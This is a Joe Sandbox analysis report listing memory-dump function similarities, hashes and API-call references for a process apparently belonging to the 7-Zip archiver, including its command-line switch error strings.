                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                                                                  • Instruction ID: 8405b0e9d5a96000a031a0fbbbbd7ff15fae9c1058f24fa756bef4645ef3372f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F71C02321C6C096CA20EB69E88579EF764F7CA750FA49112EBDA43B59CF3CC945CB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-0
                                                                                                                                                                                                                                                  • Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                                                                  • Instruction ID: ff56c92e4b09f48a34936a8e368bcdb00ac4c44a979ab3595b032ecbbb266a3a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4941F36320868481CF35AF2DF50136D3760E7D2B98F188112EA9E077A5EFBDC986C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: freememmove$ExceptionThrowmalloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1818558235-0
                                                                                                                                                                                                                                                  • Opcode ID: 198f322d7e3605dd07b0a7db7330dd27ffa8d5d8ef2ff35b5f10ecada0f47089
                                                                                                                                                                                                                                                  • Instruction ID: c4aa4d7144fd7320ff7c37d8286a55c1cc7ecd13c45d0c1802576c3ca07bff80
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 198f322d7e3605dd07b0a7db7330dd27ffa8d5d8ef2ff35b5f10ecada0f47089
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 943138B27122908B8B64DF7BD49262D73A8F7C4FD83148026DF2D97709DA24D882CB90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                                                                  • Instruction ID: 7d9c5ec8d8a05f935a1e36defa9b70f22f7f827480138d778b47a0c1b2f51f89
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F0302326E69085CA14FF33C89572E6751FBC7F81F84A461EB4E63716CE28C406C614
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                                  • Instruction ID: 7ab09328bf0e9750e27adc5be35e2d9d832324c57f8991e7d162eca6bc223947
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8F0D02726E99045CA14FF33C8A572F6711F7C3F85F459461AB4E63715CE28C446C615
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                                  • Instruction ID: d52be89e58486fa9ad532ed5b75c4fbdf9b2c17016aa3ea9ba5126b0f8177224
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6F030232AEA8141CA10FF33C895B2F6721F7C3F81F859051AF4E63711CE28C406C614
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                                  • Instruction ID: c0493047a673e48a6decf6cb8587f12cc8898eabfe3417761711fabe9c3d8d80
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDF0D02326E59085CA14FF33D4A576E6721FBC7F81F859461AB4E53716CE28C406C614
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                                                                  • Instruction ID: d4ff9b5c1e2945a52e588959a74cf945869490eef51ef323d878ccda8c46a873
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F0F42326E59045CA14FF37D45572F6751FBC7F81F459461AB4E63716CE28C406C614
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                                                                  • Instruction ID: 9faedec5bdf87c659eb9fe08afb34b6b9615b35a2e7b617c9a51be18b1524e2b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F0FE2326A98085CA14FF37D46172F6320FBC7F81F81A461AB4F63711CE28C406C619
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                                                                  • Instruction ID: 68c4224e0a609a822a38ab052592f70ac49d783696536ebb0f337ecbd956a547
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F0A22326E99485CA14FF37D46572F6320FBC7F81F81A461AB4E63716DE28C406C615
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$fputsmemset
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 469995913-0
                                                                                                                                                                                                                                                  • Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                                                                  • Instruction ID: c98331d362a53a3118bf29bcaca662eb4c58981d8cd19e1fad19eea02eabd328
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2F0D02326994081CB10FF37D89262D2321F7C3F68B449261AF6D573AACE24C843C368
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmovewcscmp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3584677832-0
                                                                                                                                                                                                                                                  • Opcode ID: c7d24e90d75f8b1a8df411daada06ff9b67f26deec57412286e52ff39d8a267a
                                                                                                                                                                                                                                                  • Instruction ID: 0712f551d7d9219b0b87b1159cc4e3e3f098b4a18e05cefc1726b52b52acbfaa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7d24e90d75f8b1a8df411daada06ff9b67f26deec57412286e52ff39d8a267a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1651E433200A8486CF20EF1ED59026D7765F3D4B98B99C126EB9E0B729DF39D886C701
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-2104980125
                                                                                                                                                                                                                                                  • Opcode ID: ed70e3db481bbb30983a976b6095b32a572669940faca3c9e13180f1720175d4
                                                                                                                                                                                                                                                  • Instruction ID: 2895407f9aa95aa74a2069efb492d19e305d88de59ca375dc6537505a2077e43
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed70e3db481bbb30983a976b6095b32a572669940faca3c9e13180f1720175d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A951CC73224690A7CF35EF28E5803AD7765F381394F84C622EA9E47756EB38C986D700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009804EE
                                                                                                                                                                                                                                                    • Part of subcall function 0097FEC8: _CxxThrowException.MSVCRT ref: 0097FF2F
                                                                                                                                                                                                                                                    • Part of subcall function 0097FEC8: free.MSVCRT ref: 0097FFAE
                                                                                                                                                                                                                                                    • Part of subcall function 0097FEC8: _CxxThrowException.MSVCRT ref: 0097FFD1
                                                                                                                                                                                                                                                    • Part of subcall function 0097FEC8: _CxxThrowException.MSVCRT ref: 0097FFF7
                                                                                                                                                                                                                                                    • Part of subcall function 0097FEC8: _CxxThrowException.MSVCRT ref: 0098002B
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00980523
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 00980564
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrow$free
                                                                                                                                                                                                                                                  • String ID: Incorrect wildcard type marker$Too short switch
                                                                                                                                                                                                                                                  • API String ID: 3129652135-1817034180
                                                                                                                                                                                                                                                  • Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                                                                  • Instruction ID: 6a5f7309aeec84503758d067f3a9bbd2baf2e90053c46692bcba8ecc88681e3b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D51BF232086D4C5DB60EB26E4507AEBB24F7C5B94F958116EF8907B65EB38C58ACB10
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                  • API String ID: 1534225298-1885708031
                                                                                                                                                                                                                                                  • Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                                                                  • Instruction ID: d27926ebda9eb4b88782e8b74c67dfd4ef91f51ad401a0ada0ad49092217117a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F516327318B8482CB60DB2AE49076E7769F7C9B94F544211EB9E437A5DF3CC849C740
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memsetstrlen$fputs
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2256168112-2735817509
                                                                                                                                                                                                                                                  • Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                                                                  • Instruction ID: f4a7e18f72261fe8b73ab6f5498231c8fd5164e1fe8bc63509d1722e2303db50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA41B2632087C095CB34EB29E5503EE67A5F784BA8F489526EE8E07719CE78C585CB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastfree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2167247754-0
                                                                                                                                                                                                                                                  • Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                                                                  • Instruction ID: d8f3ed550d096027e38777ab2856a457ab2acbc2dfbf43e27caea496864693d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A541DD2321C58085DA20EB15E4913AEB324F7D2760F90C326EBED87AD9DF38C946D705
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
